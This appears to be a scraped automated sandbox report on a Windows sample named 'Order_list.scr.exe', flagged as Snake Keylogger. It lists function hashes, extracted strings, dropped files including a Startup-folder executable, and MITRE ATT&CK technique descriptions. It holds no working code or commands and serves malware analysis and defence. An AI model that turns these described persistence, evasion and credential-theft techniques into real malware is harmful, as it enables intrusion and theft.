Opcode Fuzzy Hash: 5715f24d944f0ced6532f01c57707bb9e362ba8d3492b497251ddb4abbca8654
Instruction Fuzzy Hash: 12D06C78D4512C9BCB20EFA8EA552ECB7B0EB8A310F0014E79909B3610D7345EA09F61

Function 009A5EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9a0000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 847657fda891b1a50f3dbca6110054f1cf1a65189130f74770507f883d336665
Instruction ID: 704b398cfe9ea8e34f34a4e5f8a8a0bab0fa448f8effc4ddc613af93171bc6c2
Opcode Fuzzy Hash: 847657fda891b1a50f3dbca6110054f1cf1a65189130f74770507f883d336665
Instruction Fuzzy Hash: FAC0127214C3494FC545F775EA85559BB6AE6C0301F40C520B4090A22EEF7C598846A0

Non-executed Functions

Function 063528B0 Relevance: 23.0, Strings: 18, Instructions: 461COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06352CE2
PH^q, xrefs: 06352DEB
LjAp, xrefs: 06352D51
PH^q, xrefs: 06352EE6
LjAp, xrefs: 06352C5C
LjAp, xrefs: 06352B7A
PH^q, xrefs: 06352CF6
", xrefs: 06353087
LjAp, xrefs: 06352C72
LjAp, xrefs: 06352B64
0oAp, xrefs: 06352A00
LjAp, xrefs: 06352E5F
PH^q, xrefs: 06352ED2
LjAp, xrefs: 06352D67
PH^q, xrefs: 06352DD7
LjAp, xrefs: 06352E49
PH^q, xrefs: 06352BEA
PH^q, xrefs: 06352BFE

Memory Dump Source

Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6350000_00.jbxd

Similarity

API ID:
String ID: "$0oAp$LjAp$LjAp$LjAp$LjAp$LjAp$LjAp$LjAp$LjAp$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
API String ID: 0-2009027844
Opcode ID: db7b305f55ba5722a213e8e6af5fc49449f40ef30c4307028f1c196a3f01df0e
Instruction ID: eadfb64a9c60fe8f7a00f312346f8b949253836e23e9f60f4ee7611932499dfa
Opcode Fuzzy Hash: db7b305f55ba5722a213e8e6af5fc49449f40ef30c4307028f1c196a3f01df0e
Instruction Fuzzy Hash: 2D329F74E01218CFDB64DF69C984B9DBBB2BF89300F1081A9D809AB365DB759E85CF50

Function 06352809 Relevance: 14.2, Strings: 11, Instructions: 420COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06352CE2
PH^q, xrefs: 06352DEB
PH^q, xrefs: 06352EE6
Hbq, xrefs: 06352869
0oAp, xrefs: 06352A00
PH^q, xrefs: 06352CF6
PH^q, xrefs: 06352ED2
", xrefs: 06353087
PH^q, xrefs: 06352DD7
PH^q, xrefs: 06352BEA
PH^q, xrefs: 06352BFE

Memory Dump Source

Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6350000_00.jbxd

Similarity

API ID:
String ID: "$0oAp$Hbq$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
API String ID: 0-2279143882
Opcode ID: 06bbc1b10aa0fb53e653d8642037e1e3be30758d8b14147e8d2a234d708e37ff
Instruction ID: e060f83b2bbe62d480a2539910931c07b0ecf043b0f0ff581fc1ae9380e7c6a2
Opcode Fuzzy Hash: 06bbc1b10aa0fb53e653d8642037e1e3be30758d8b14147e8d2a234d708e37ff
Instruction Fuzzy Hash: 5D12D474E012188FDB58DF69C994B9DBBF2BF89300F1081A9D809AB365DB359E85CF50

Function 06352807 Relevance: 14.1, Strings: 11, Instructions: 388COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06352CE2
PH^q, xrefs: 06352DEB
PH^q, xrefs: 06352EE6
Hbq, xrefs: 06352869
0oAp, xrefs: 06352A00
PH^q, xrefs: 06352CF6
PH^q, xrefs: 06352ED2
", xrefs: 06353087
PH^q, xrefs: 06352DD7
PH^q, xrefs: 06352BEA
PH^q, xrefs: 06352BFE

Memory Dump Source

Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6350000_00.jbxd

Similarity

API ID:
String ID: "$0oAp$Hbq$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
API String ID: 0-2279143882
Opcode ID: ca1d746b930505ac2f71b0be98fdcace41815c5f546f618df62a9aa5e683f99e
Instruction ID: ba2621218aca74e9f5842229e1d08d4e0555ffc8b030626473b49d5f25d98615
Opcode Fuzzy Hash: ca1d746b930505ac2f71b0be98fdcace41815c5f546f618df62a9aa5e683f99e
Instruction Fuzzy Hash: 8F12C174E002188FDB58DF69C994B9DBBF2BF89300F1085A9D809AB365DB359E85CF50

Function 009A21E2 Relevance: 5.1, Strings: 4, Instructions: 90COMMON

Download Yara Rule

Strings

Xbq, xrefs: 009A2248
Xbq, xrefs: 009A22C7
Xbq, xrefs: 009A2314
Xbq, xrefs: 009A220E

Memory Dump Source

Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9a0000_00.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: 27b4bff3e693dd0628a2a01e8a12abbdca91f721f8d6975ceeafd58a56207854
Instruction ID: b67c7810f4c9f4e44de5d144fc32d0ad571ed90aaa2144c058d51591d80c8330
Opcode Fuzzy Hash: 27b4bff3e693dd0628a2a01e8a12abbdca91f721f8d6975ceeafd58a56207854
Instruction Fuzzy Hash: 60317671D043198BDF68CB6DC58036FB6BABB9A300F204575C829A7254DB34CE81CBD2

Function 009A6088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 009A609E
\;^q, xrefs: 009A6094
\;^q, xrefs: 009A60C6
\;^q, xrefs: 009A60BA

Memory Dump Source

Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9a0000_00.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: 9e42112c2b79fd78913d4fa5ff580d2da2548a45f9b511fba56320744b63443f
Instruction ID: eb684df068f987bba4cd07ccaed15a9fb3dd6c4c7324b4806255433de76ed919
Opcode Fuzzy Hash: 9e42112c2b79fd78913d4fa5ff580d2da2548a45f9b511fba56320744b63443f
Instruction Fuzzy Hash: 78017C31B401249FCB648E2EC44492677EFAF9AB60729457AE502CB3B4DA72DC8187D0

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Order_list.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10eah0zx.ydh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4wamnlfk.cxk.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkvxvzhj.u5i.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r22yn3xp.vuy.ps1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Windows Analysis Report
Order_list.scr.exe

Function 0093D3C9 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Function 0093D3D8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 0093AD48 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Function 0093590D Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 00934248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre